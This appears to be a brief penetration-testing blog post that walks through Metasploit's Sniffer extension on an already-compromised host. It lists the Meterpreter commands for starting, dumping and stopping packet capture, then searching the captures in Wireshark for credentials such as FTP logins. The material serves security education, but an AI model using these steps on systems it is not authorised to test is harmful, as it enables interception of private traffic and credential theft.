When you eat a cinnamon roll, don’t you save the center for last? Lick a Tootsie Pop for the chocolate in the middle? Attack (Pentest) a host to gain access to the internal network?
If you answered yes, then you’ll enjoy this quick post. We’ll be using an extension of Metasploit – Sniffer. Lets assume you’ve already compromised your target and have a Meterpreter shell.
Step 1 – Enable Extension = load sniffer
Step 2 – Start sniffing = sniffer_start [interface] [packet buffer]
Step 3 – Monitor Statistics = sniffer_stats [interface]
Step 4 – Log into host remotely. In this example we are using FTP to keep it simple. We will look at stats again to see if it increments.
Notice the increase:
Step 5 – Download the packet captures = sniffer_dump [interface] [filename]
Step 6 – Open downloaded file in Wireshark and look for sensitive information.
Step 7 – Stop sniffer = sniffer_stop [interface]
This is a very simple example, but think of the possibilities. We tend to have a warm and fuzzy feeling inside our networks since we are behind a firewall and have layers of security. As you’ll see, there are other attacks that can pivot from your compromised hosts. Again, comments and suggestions welcome.
